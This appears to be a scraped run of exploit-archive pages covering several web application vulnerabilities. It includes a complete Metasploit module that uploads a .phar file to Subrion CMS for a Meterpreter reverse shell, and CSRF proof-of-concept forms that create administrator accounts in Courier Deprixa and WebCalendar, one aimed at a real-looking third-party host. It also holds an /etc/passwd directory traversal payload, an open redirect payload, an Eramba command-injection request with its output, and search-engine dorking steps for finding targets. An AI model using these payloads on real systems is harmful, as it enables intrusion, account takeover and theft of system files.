The WP Shopping Pages WordPress plugin through 1.14 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

CVE-2023-3492

This Metasploit module exploits an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by the .htaccess file not preventing the execution of .pht, .phar, and .xhtml files. Files with these extensions are not included in the .htaccess blacklist, hence these files can be uploaded and executed to achieve remote code execution. In this module, a .phar file with a randomized name is uploaded and executed to receive a Meterpreter session on the target, then deletes itself afterwards.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::PhpEXE  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE',        'Description' => %q{          This module exploits an authenticated file upload vulnerability in          Subrion CMS versions 4.2.1 and lower. The vulnerability is caused by          the .htaccess file not preventing the execution of .pht, .phar, and          .xhtml files. Files with these extensions are not included in the          .htaccess blacklist, hence these files can be uploaded and executed          to achieve remote code execution. In this module, a .phar file with          a randomized name is uploaded and executed to receive a Meterpreter          session on the target, then deletes itself afterwards.        },        'License' => MSF_LICENSE,        'Author' => [          'Hexife',             # Original discovery, PoC, and CVE submission          'Fellipe Oliveira',   # ExploitDB author          'Ismail E. Dawoodjee' # Metasploit module author        ],        'References' => [          [ 'EDB', '49876' ],          [ 'CVE', '2018-19422' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/801' ],          [ 'URL', 'https://github.com/intelliants/subrion/issues/840' ],          [ 'URL', 'https://github.com/advisories/GHSA-73xj-v6gc-g5p5' ]        ],        'Platform' => 'php',        'Arch' => ARCH_PHP,        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2018-11-04',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(80, true, 'Subrion CMS default port'),        OptString.new('TARGETURI', [ true, 'Base path', '/' ]),        OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin' ]),        OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin' ])      ]    )  end  def check    uri = normalize_uri(target_uri.path, 'panel/') # requires a trailing forward slash    print_status("Checking target web server for a response at: #{full_uri(uri)}")    res = send_request_cgi({      'method' => 'GET',      'uri' => uri    })    unless res      return CheckCode::Unknown('Target did not respond to check request.')    end    unless res.code == 200 && res.body.downcase.include?('subrion')      return CheckCode::Unknown('Target is not running Subrion CMS.')    end    print_good('Target is running Subrion CMS.')    # Powered by <a href="https://subrion.org/" title="Subrion CMS">Subrion CMS v4.2.1</a><br>    print_status('Checking Subrion CMS version...')    version_number = res.body.to_s.scan(/Subrion\sCMS\sv([\d.]+)/).flatten.first    unless version_number      return CheckCode::Detected('Subrion CMS version cannot be determined.')    end    print_good("Target is running Subrion CMS Version #{version_number}.")    if Rex::Version.new(version_number) <= Rex::Version.new('4.2.1')      return CheckCode::Appears(        'However, this version check does not guarantee that the target is vulnerable, ' \        'since a fix for the vulnerability can easily be applied by a web admin.'      )    end    return CheckCode::Safe  end  def login_and_get_csrf_token(username, password)    print_status('Connecting to Subrion Admin Panel login page to obtain CSRF token...')    # Session cookies need to be kept to preserve the CSRF token across multiple requests    uri = normalize_uri(target_uri.path, 'panel/')    res = send_request_cgi({      'method' => 'GET',      'uri' => uri,      'keep_cookies' => true    })    unless res && res.code == 200      fail_with(Failure::Unknown, "#{peer} - Could not access the Subrion Admin Panel page.")    end    # <input type="hidden" name="__st" value="CA0S3w50vz1zRpdgZl98JAMVrimiXI63lKtxAwyi">    %r{name="__st" value="(?<csrf_token>[\w+=/]+)">} =~ res.body    fail_with(Failure::NotFound, "#{peer} - Failed to get CSRF token.") if csrf_token.nil?    print_good("Successfully obtained CSRF token: #{csrf_token}")    print_status(      "Logging in to Subrion Admin Panel at: #{full_uri(uri)} " \      "using credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}"    )    auth = send_request_cgi({      'method' => 'POST',      'uri' => uri,      'keep_cookies' => true,      'vars_post' => {        '__st' => csrf_token,        'username' => username,        'password' => password      }    })    unless auth && auth.code == 200      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, cannot access the Admin Panel page.")    end    %r{name="__st" value="(?<csrf_token_auth>[\w+=/]+)">} =~ auth.body    unless csrf_token == csrf_token_auth && auth.body.downcase.include?('administrator')      fail_with(Failure::NoAccess, "#{peer} - Failed to log in, invalid credentials.")    end    print_good('Successfully logged in as Administrator.')    return csrf_token  end  def upload_and_execute_payload(csrf_token)    print_status('Preparing payload...')    # set `unlink_self: true` to delete the file after execution    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.phar"    php_payload = get_write_exec_payload(unlink_self: true)    data = Rex::MIME::Message.new    data.add_part(Rex::Text.rand_text_alphanumeric(14), nil, nil, 'form-data; name="reqid"')    data.add_part('upload', nil, nil, 'form-data; name="cmd"')    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')    data.add_part(csrf_token, nil, nil, 'form-data; name="__st"')    data.add_part(      "#{php_payload}\n",      'application/octet-stream',      nil,      "form-data; name=\"upload[]\"; filename=\"#{payload_name}\""    )    data.add_part(Time.now.getutc.to_i.to_s, nil, nil, 'form-data; name="mtime[]"')    print_status('Sending POST data...')    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'panel', 'uploads', 'read.json'),      'keep_cookies' => true,      'ctype' => "multipart/form-data; boundary=#{data.bound}",      'data' => data.to_s    })    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload PHP payload.")    end    payload_uri = normalize_uri(target_uri.path, 'uploads', payload_name)    print_good("Successfully uploaded payload at: #{full_uri(payload_uri)}")    # This execution request returns nil    print_status("Executing '#{payload_name}'... This file will be deleted after execution.")    send_request_cgi({      'method' => 'GET',      'uri' => payload_uri,      'keep_cookies' => true    })    print_good("Successfully executed payload: #{full_uri(payload_uri)}")  end  def exploit    csrf_token = login_and_get_csrf_token(datastore['USERNAME'], datastore['PASSWORD'])    upload_and_execute_payload(csrf_token)  endend

Intelliants Subrion CMS 4.2.1 Remote Code Execution

COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>                          </div>                          <div class="modal-body">                                                      <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">                              <div class="form-group " id="gnombrepa">                              <label for="off_name" class="col-sm-2 control-label">Name</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">                              </div>                              </div>                              <div class="form-group" id="gapellido">                              <label for="email" class="col-sm-2 control-label">Email </label>                              <div class="col-sm-5">                                <input type="text" class="form-control email" name="email"   placeholder="Email ">                              </div>                              <div class="col-sm-5">                                <input class="form-control phone" name="phone" placeholder="Phone">                                                                    </div>                              </div>                              <div class="form-group" id="gemail">                              <label for="office" class="col-sm-2 control-label">Office</label>                              <div class="col-sm-5">                                <input type="text" class="form-control office" name="office"  placeholder="Office ">                              </div>                              <div class="col-sm-5">                              <select type="text" class="form-control role" name="role" >                                <option value="Administrator">Administrator</option>                                                    </select>                              </div>                              </div>                              <div class="form-group " id="gnombre">                              <label for="off_name" class="col-sm-2 control-label">User</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name"  placeholder="User">                              </div>                              </div>                              <div class="form-group" id="gpassword">                              <label for="pwd" class="col-sm-2 control-label">Password</label>                              <div class="col-sm-10">                                <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">                              </div>                              </div>                              <div class="form-group">                              <div class="col-sm-offset-2 col-sm-10">                                <div class="checkbox checkbox-success">                                  <input id="checkbox3" type="checkbox" name="estado" value="1" checked>                                  <label for="checkbox3">                                    Status                                  </label>                                </div>                                <div class="checkbox checkbox-inline" >                                  <input type="checkbox"  name="type" value="a" onclick="return false" checked>                                  <label for="inlineCheckbox3"> Type of user </label>                                </div>                              </div>                              </div>                                                          </div>                            <div class="modal-footer">                              <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>                                Close</button>                              <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">                            </div>                          </form>                                                      </div>                        </div>                      </div>                      <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

COURIER DEPRIXA 2.5 Cross Site Request Forgery

WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  | # Dork      : WebCalendar v1.3                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  <head>    <title>WebCalendar Setup Wizard</title>    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />    <script>    </script>    <script src="../includes/js/visible.js"></script>    <style>      body {        margin:0;        background:#fff;        font-family:Arial, Helvetica, sans-serif;      }      table {        border:0;      }      th.header,      th.pageheader,      th.redheader {        background:#eee;      }      th.pageheader {        padding:10px;        font-size:18px;      }      th.header,      th.redheader {        font-size:14px;      }      th.redheader,      .notrecommended {        color:red;      }      td {        padding:5px;      }      td.prompt,      td.subprompt {        padding-right:20px;        font-weight:bold;      }      td.subprompt {        font-size:12px;      }      div.nav {        margin:0;        border-bottom:1px solid #000;      }      div.main {        margin:10px;      }      li {        margin-top:10px;      }      doc.li {        margin-top:5px;      }      .recommended {        color:green;      }    </style>  </head>  <body onload="auth_handler();">    <table border="1" width="90%" class="aligncenter">      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>      <tr>        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>      </tr>      <th class="header" colspan="2">Application Settings</th>      <tr>        <td colspan="2">          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>        </td>      </tr>      <tr>        <td>          <table width="75%" class="aligncenter">            <tr>            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">              <input type="hidden" name="app_settings" value="1" />              <td class="prompt">Create Default Admin Account:</td>              <td>                <input type="checkbox" name="load_admin" value="Yes" />                <span class="notrecommended"> (Admin Account Not Found)</span>              </td>            </tr>            <tr>              <td class="prompt">Application Name:</td>              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>            </tr>            <tr>              <td class="prompt">Server URL:</td>              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>            </tr>            <tr>              <td class="prompt">User Authentication:</td>              <td>                <select name="form_user_inc" onChange="auth_handler()">                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>                  <option value="http">Web Server (not detected)</option>                  <option value="user-imap.php">IMAP</option>                  <option value="none" >None (Single-User)</option>                </select>              </td>            </tr>            <tr id="singleuser">              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>              <td><input name="form_single_user_login" size="20" value="" /></td>            </tr>            <tr>              <td class="prompt">Read-Only:</td>              <td>                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;                <input name="form_readonly" value="false" type="radio" checked="checked" />No              </td>            </tr>            <tr>              <td class="prompt">Environment:</td>              <td>                <select name="form_mode">                  <option value="prod" selected="selected">Production</option>                  <option value="dev">Development</option>                </select>              </td>            </tr>          </table>        </td>      </tr>    </table>    <table width="80%" class="aligncenter">      <tr>        <td class="aligncenter">              <input name="action" type="button" value="Save Settings" onClick="return validate();" />              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />            </form>        </td>      </tr>    </table>  </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCalendar 1.3 Cross Site Request Forgery

An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.

**Authenticated remote code execution in Eramba****Overview**

Advisory ID: TRSA-2303-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2303-01  
Affected product: Eramba  
Affected version: 3.19.1 (Enterprise and Community edition)  
Vendor: Eramba Limited, https://www.eramba.org  
Credits: Trovent Security GmbH, Sergey Makarov

**Detailed description**

Eramba is a web application for managing Governance, Risk, and Compliance (GRC).  
Trovent Security GmbH discovered that the Eramba web application allows remote code execution for authenticated users.  
A possible attacker is able to modify the parameter “path” in the URL “https://hostname/settings/download-test-pdf?path=” to execute arbitrary commands in the context of the user account the application is running in.  
To see the output of the executed command in the HTTP response, debug mode has to be enabled.

Severity: High  
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)  
CVE ID: CVE-2023-36255  
CWE ID: CWE-94

**Proof of concept**

HTTP request:

GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1
Host: \[redacted\]
Cookie: translation=1; csrfToken=1l2rXXwj1D1hVyVRH%2B1g%2BzIzYTA3OGFiNWRjZWVmODQ1OTU1NWEyODM2MzIwZTZkZTVlNmU1YjY%3D; PHPSESSID=14j6sfroe6t2g1mh71g2a1vjg8
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://\[redacted\]/settings
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

HTTP response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 31 Mar 2023 12:37:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Access-Control-Allow-Origin: \*
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Disposition: attachment; filename="test.pdf"
X-DEBUGKIT-ID: d383f6d4-6680-4db0-b574-fe789abc1718
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2033469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Error: The exit status code '127' says something went wrong:
stderr: &quot;sh: 1: --dpi: not found
&quot;
stdout: &quot;1: lo: &lt;LOOPBACK,UP,LOWER\_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid\_lft forever preferred\_lft forever
    inet6 ::1/128 scope host
       valid\_lft forever preferred\_lft forever
2: ens33: &lt;BROADCAST,MULTICAST,UP,LOWER\_UP&gt; mtu 1500 qdisc fq\_codel state UP group default qlen 1000
    link/ether \[redacted\] brd ff:ff:ff:ff:ff:ff
    inet \[redacted\] brd \[redacted\] scope global ens33
       valid\_lft forever preferred\_lft forever
    inet6 \[redacted\] scope link
       valid\_lft forever preferred\_lft forever
&quot;
command: ip a; --dpi '90' --lowquality --margin-bottom '0' --margin-left '0'
--margin-right '0' --margin-top '0' --orientation 'Landscape'
--javascript-delay '1000' '/tmp/knp\_snappy6426d4231040e1.91046751.html'
'/tmp/knp\_snappy6426d423104587.46971034.pdf'. </title>

\[...\]

**Solution / Workaround**

The vendor released a fixed version of Eramba.

Fixed in version 3.19.2.

**History**

2023-03-31: Vulnerability found  
2023-04-04: Vendor contacted  
2023-04-17: Vendor confirmed vulnerability  
2023-04-20: Vendor released fixed version  
2023-05-25: Trovent verified remediation of the vulnerability  
2023-06-13: CVE ID requested  
2023-07-28: CVE ID received  
2023-08-01: Advisory published

CVE-2023-36255: Security Advisory 2303-01 - Trovent Security GmbH

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

Courier Deprixa Pro Integrated Web System version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability                                              |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |    
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 7.

[+] Set the target site link Save changes and apply . 

[+] infected file : settings/addusersadmin/agregar.php

[+] save code as poc.html .

<div class="modal-content">  
              <div class="modal-header">  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/bluedotcourriercom/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input class="form-control email" name="email" id="id_mail" placeholder="demo@demo.com" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" data-parsley-id="12">  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text">  
                  </div>  
                  </div>  
                  <br><br>  
                    <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>  
                         
          </div>  
            
          </div>  
        </div>         
        </div>  
          
      </div>  
      </div>  
            
    </div>  
    </div>  
  </div>  
  

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Courier Deprixa Pro Integrated Web System 3.2.5 Cross Site Request Forgery

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter

Eramba version 3.19.1 suffers from a remote command execution vulnerability.

    # Trovent Security Advisory 2303-01 ######################################Authenticated remote code execution in Eramba#############################################Overview########Advisory ID: TRSA-2303-01Advisory version: 1.0Advisory status: PublicAdvisory URL: https://trovent.io/security-advisory-2303-01Affected product: ErambaAffected version: 3.19.1 (Enterprise and Community edition)Vendor: Eramba Limited, https://www.eramba.orgCredits: Trovent Security GmbH, Sergey MakarovDetailed description####################Eramba is a web application for managing Governance, Risk, and Compliance (GRC).Trovent Security GmbH discovered that the Eramba web application allows remotecode execution for authenticated users.A possible attacker is able to modify the parameter "path" in the URL"https://hostname/settings/download-test-pdf?path=" to execute arbitrarycommands in the context of the user account the application is running in.To see the output of the executed command in the HTTP response, debug mode hasto be enabled.Severity: HighCVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)CVE ID: CVE-2023-36255CWE ID: CWE-94Proof of concept################HTTP request:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~GET /settings/download-test-pdf?path=ip%20a; HTTP/1.1Host: [redacted]Cookie: translation=1; 